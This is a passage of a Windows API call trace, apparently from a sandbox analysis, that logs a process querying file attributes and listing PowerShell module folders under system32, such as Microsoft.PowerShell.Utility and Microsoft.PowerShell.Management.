ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0263.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV", nBufferLength=0x37, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV", lpFilePart=0x0) returned 0x36 [0263.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.120] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\uev"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x744502b, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0263.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient", nBufferLength=0x3d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient", lpFilePart=0x0) returned 0x3c [0263.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.121] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\vpnclient"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0263.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac", nBufferLength=0x38, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac", lpFilePart=0x0) returned 0x37 [0263.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.122] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\wdac"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc112c5e, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc112c5e, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Whea", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0263.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Whea", nBufferLength=0x38, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Whea", lpFilePart=0x0) returned 0x37 [0263.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.122] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Whea" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\whea"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4b [0263.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense", nBufferLength=0x4b, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense", lpFilePart=0x0) returned 0x4a [0263.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.122] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsdeveloperlicense"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc112c5e, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc112c5e, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0263.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting", nBufferLength=0x49, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting", lpFilePart=0x0) returned 0x48 [0263.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.123] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc12a589, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc12a589, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0263.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch", nBufferLength=0x41, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch", lpFilePart=0x0) returned 0x40 [0263.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.123] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowssearch"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0263.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate", nBufferLength=0x41, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate", lpFilePart=0x0) returned 0x40 [0263.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsupdate"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc12a589, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc12a589, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0263.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0263.125] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ca8e4b, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7450 [0263.125] FindNextFileW (in: hFindFile=0x1acc7450, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ca8e4b, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.125] FindNextFileW (in: hFindFile=0x1acc7450, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x9a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0263.125] FindNextFileW (in: hFindFile=0x1acc7450, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x18b47e72, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x7780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0263.125] FindNextFileW (in: hFindFile=0x1acc7450, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x18b47e72, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x7780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0263.125] FindClose (in: hFindFile=0x1acc7450 | out: hFindFile=0x1acc7450) returned 1 [0263.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.126] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0263.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0263.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0263.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0263.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0263.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.126] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23d6ed0 | out: lpFileInformation=0x23d6ed0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x9a9)) returned 1 [0263.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0263.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0263.127] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ca8e4b, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7c90 [0263.127] FindNextFileW (in: hFindFile=0x1acc7c90, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ca8e4b, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.128] FindNextFileW (in: hFindFile=0x1acc7c90, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ccf0e7, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0263.128] FindNextFileW (in: hFindFile=0x1acc7c90, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ccf0e7, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0263.128] FindClose (in: hFindFile=0x1acc7c90 | out: hFindFile=0x1acc7c90) returned 1 [0263.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.128] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0263.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0263.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0263.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0263.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0263.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.132] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23d7868 | out: lpFileInformation=0x23d7868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7cf5777, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xa16)) returned 1 [0263.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0263.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x45, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0263.133] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc78d0 [0263.133] FindNextFileW (in: hFindFile=0x1acc78d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.133] FindNextFileW (in: hFindFile=0x1acc78d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xf5fef5a2, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x3ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0263.133] FindNextFileW (in: hFindFile=0x1acc78d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, 